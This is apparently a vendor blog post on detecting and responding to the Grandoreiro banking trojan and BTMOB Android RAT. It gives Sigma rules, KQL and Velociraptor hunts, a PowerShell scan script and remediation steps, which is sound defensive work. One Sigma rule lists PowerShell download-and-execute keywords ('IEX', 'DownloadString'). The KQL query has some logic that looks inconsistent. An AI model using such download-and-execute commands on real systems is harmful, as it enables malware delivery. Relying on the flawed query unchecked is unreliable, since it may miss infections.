Back to Intelligence

Grandoreiro Banking Trojan & BTMOB RAT: Detection and Incident Response Guide

SA
Security Arsenal Team
May 27, 2026
7 min read

Security teams must heighten defenses against active campaigns deploying the Grandoreiro banking trojan and BTMOB RAT. Recent intelligence from WatchGuard and ESET confirms threat actors are aggressively targeting entities in Spain, Portugal, and Mexico with Windows-based infections, while simultaneously mobile users in Brazil are under siege via Android malware.

This is not a theoretical exercise. These are financially motivated operations designed to hijack banking sessions and steal sensitive credentials. The dual-platform approach indicates a mature threat ecosystem aiming to maximize the attack surface. Defenders need to move beyond basic antivirus signatures and implement behavioral detection strategies to identify the execution chains and persistence mechanisms associated with these families.

Technical Analysis

Threat Overview:

  • Grandoreiro (Windows): A sophisticated banking trojan (aka "Depriz") known for its modular architecture. It typically arrives via phishing emails containing malicious attachments (often ISO or ZIP files). Once executed, it establishes persistence, hooks into browser processes to manipulate web sessions, and communicates with Command & Control (C2) servers to receive instructions.
  • BTMOB RAT (Android): A Remote Access Trojan targeting mobile devices. It exhibits capabilities common to mobile banking malware, including overlay attacks (drawing fake login screens over legitimate apps), SMS interception for 2FA bypass, and unauthorized keylogging.

Attack Chain:

  1. Initial Access: Phishing emails with malicious attachments (Grandoreiro) or compromised/sideloading apps (BTMOB).
  2. Execution:
    • Windows: User opens attachment -> Script/MSI installer executes -> Payload decrypted in memory.
    • Android: App installs -> Requests abusive permissions (Accessibility, SMS).
  3. Persistence:
    • Windows: Registry Run keys, Scheduled Tasks, or Service creation.
    • Android: Background services, leveraging Accessibility Services to survive restarts.
  4. C2 Communication: Encrypted traffic to known malicious infrastructure to exfiltrate data and receive updates.

Exploitation Status:

  • Status: Confirmed active exploitation (ITW).
  • Geography: Spain, Portugal, Mexico (Windows); Brazil (Android).

Detection & Response

The following detection rules and queries are designed to identify the behavioral fingerprints of these campaigns. While Grandoreiro evolves, its reliance on MSI installers and process injection is a consistent TTP that can be hunted.

Sigma Rules

YAML
---
title: Potential Grandoreiro Banking Trojan Execution via MSI
id: 8a4b2c91-2d3e-4f5a-9b1c-3d6e7f8a9b0c
status: experimental
description: Detects potential execution of Grandoreiro banking trojan via MSI installers spawned from user directories, a common delivery vector.
references:
  - https://www.watchguard.com/wgrd-resource-center/security-center/threat-views/grandoreiro
author: Security Arsenal
date: 2026/05/06
tags:
  - attack.execution
  - attack.t1204
  - attack.initial_access
  - attack.t1566
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\\msiexec.exe'
    CommandLine|contains:
      - '/i'
      - '/package'
  filter_generic:
    ParentImage|contains:
      - '\\System32\'
      - '\\SysWOW64\'
  selection_suspicious_path:
    CommandLine|contains:
      - '\\AppData\\Local\\Temp'
      - '\\AppData\\Roaming'
      - '\\Downloads'
  condition: selection and not filter_generic and selection_suspicious_path
falsepositives:
  - Legitimate software installations by users (rare in enterprise environments without approval)
level: high
---
title: Suspicious PowerShell Web Request (Grandoreiro Downloader)
id: 9b5c3d02-3e4f-5a6b-0c2d-4e7f8a9b1c2d
status: experimental
description: Detects PowerShell commands used to download payloads, a technique frequently used in the initial stages of banking trojan infections like Grandoreiro.
references:
  - https://attack.mitre.org/techniques/T1059/001/
author: Security Arsenal
date: 2026/05/06
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\\powershell.exe'
      - '\\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  condition: selection
falsepositives:
  - System administration scripts
  - Legitimate software update mechanisms
level: medium

KQL (Microsoft Sentinel)

This query hunts for the Grandoreiro execution chain on Windows endpoints and flags network connections associated with mobile malware C2 if proxied through corporate infrastructure.

KQL — Microsoft Sentinel / Defender
// Hunt for Grandoreiro MSI execution patterns
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ \"msiexec.exe\"
| where ProcessCommandLine has_any (\"/i\", \"/package\")
| where ProcessCommandLine has_any (\"AppData\\\Local\\\Temp\", \"AppData\\\Roaming\", \"Downloads\")
| extend InitiatedBy = AccountName, DeviceName = DeviceName
| project Timestamp, DeviceName, InitiatedBy, FolderPath, ProcessCommandLine, InitiatingProcessFileName
| join kind=leftanti (
    DeviceProcessEvents
    | where FileName =~ \"msiexec.exe\"
    | where InitiatingProcessFileName in~ (\"services.exe\", \"svchost.exe\", \"explorer.exe\") 
    // Note: explorer.exe is a common parent for user-initiated msiexec, but we filter for system paths in the main query logic conceptually
) on DeviceName, Timestamp
// Correlate with network connections to potential C2
| join kind=inner (DeviceNetworkEvents | where Timestamp > ago(7d) | where RemotePort in (443, 80) | project DeviceName, RemoteUrl, RemoteIP, RemotePort) on DeviceName
| summarize Count=count() by DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName
| where Count > 0

Velociraptor VQL

Hunt for persistence mechanisms and file artifacts associated with Grandoreiro.

VQL — Velociraptor
-- Hunt for Grandoreiro persistence mechanisms and suspicious MSI files
SELECT 
  OSPath,
  Mtime,
  Atime,
  Size,
  Mode
FROM glob(globs=\"\\\Users\\\*\\\AppData\\\Roaming\\\*.msi\", root=\"/\")
WHERE Mtime > now() - 7d

UNION ALL

-- Hunt for suspicious Run Key persistence
SELECT 
  key.FullPath as RegistryPath,
  key.Data.mtime as ModifiedTime,
  value.name as ValueName,
  value.data as ValueData
FROM read_reg_key(globs=\"HKEY_USERS\\\*\\\Software\\\Microsoft\\\Windows\\\CurrentVersion\\\Run\\\*\")
WHERE ValueData =~ \".exe\" AND NOT ValueData =~ \"Program Files\" AND NOT ValueData =~ \"ProgramData\"
  AND ModifiedTime > now() - 30d

Remediation Script (PowerShell)

Use this script to identify and contain potential Grandoreiro artifacts on a Windows host. Requires administrative privileges.

PowerShell
# Security Arsenal - Grandoreiro Incident Response Script
# Run as Administrator

function Invoke-GrandoreiroRemediation {
    Write-Host \"[+] Starting Grandoreiro Artifact Scan and Remediation...\" -ForegroundColor Cyan
    
    # 1. Check for suspicious MSI files in User Profiles (Common Dropper)
    Write-Host \"[*] Scanning for suspicious MSI files in user profiles...\" -ForegroundColor Yellow
    $msiPaths = @(\"C:\\Users\\*\\AppData\\Local\\Temp\\*.msi\", \"C:\\Users\\*\\Downloads\\*.msi\")
    $suspiciousMSI = Get-ChildItem -Path $msiPaths -Force -ErrorAction SilentlyContinue | 
                    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
    
    if ($suspiciousMSI) {
        foreach ($file in $suspiciousMSI) {
            Write-Host \"[!] Suspicious MSI found: $($file.FullName)\" -ForegroundColor Red
            # Quarantine logic placeholder or removal
            # Remove-Item -Path $file.FullName -Force -WhatIf
        }
    } else {
        Write-Host \"[-] No recent suspicious MSI files found.\" -ForegroundColor Green
    }

    # 2. Check Registry Run Keys for Suspicious Persistence
    Write-Host \"[*] Auditing Registry Run Keys for suspicious persistence...\" -ForegroundColor Yellow
    $runKeys = @(
        \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\",
        \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\",
        \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"
    )
    
    foreach ($key in $runKeys) {
        if (Test-Path $key) {
            Get-Item -Path $key | ForEach-Object {
                $_.Property | ForEach-Object {
                    $propValue = (Get-ItemProperty -Path $key -Name $_).$_
                    # Flag binaries not in Program Files or Windows
                    if ($propValue -match \"^.*\.exe$\" -and $propValue -notmatch \"Program Files\" -and $propValue -notmatch \"Windows\") {
                        Write-Host \"[!] Suspicious Run Key Entry: $key\\$_ = $propValue\" -ForegroundColor Red
                    }
                }
            }
        }
    }

    # 3. Network Hardening (Block known C2 ranges - Placeholder for Intel)
    # Note: Add specific Grandoreiro IPs/URLs here based on current intel feeds
    Write-Host \"[*] Ensure firewall blocks outbound connections to non-corporate IPs on non-standard ports.\" -ForegroundColor Yellow
    Write-Host \"[+] Remediation scan complete. Manual review required for flagged artifacts.\" -ForegroundColor Green
}

Invoke-GrandoreiroRemediation

Remediation

Immediate Actions:

  1. Isolate Infected Hosts: Disconnect confirmed or suspected Windows and Android devices from the network immediately to prevent lateral movement and data exfiltration.
  2. Block Indicators of Compromise (IOCs): Update firewalls, secure web gateways (SWG), and endpoint detection systems with the latest IOCs provided by WatchGuard and ESET for Grandoreiro and BTMOB.
  3. Password Resets: Force a reset of banking credentials and sensitive corporate passwords for users on affected devices, assuming potential credential theft.

Eradication and Recovery:

  • Windows: Reimage compromised machines. Grandoreiro is a complex trojan with multiple components; simple file deletion is often insufficient.
  • Android: Perform a factory reset on compromised mobile devices. Do not attempt to clean the device via mobile AV; a factory reset is the only guaranteed way to remove RAT persistence.

Long-Term Hardening:

  • Application Whitelisting: Implement strict application control (e.g., AppLocker) to prevent msiexec.exe from running from user profile directories.
  • Mobile Device Management (MDM): Enforce "Google Play Protect" and disable "Install Unknown Apps" for all corporate-enrolled Android devices to prevent BTMOB RAT installation.
  • Phishing Resistance: Enhance email filtering to block ISO, ZIP, and MSI attachments from external sources.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectiongrandoreirobtmob-ratbanking-trojan

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action
Grandoreiro Banking Trojan & BTMOB RAT: Detection and Incident Response Guide | Security Arsenal | Security Arsenal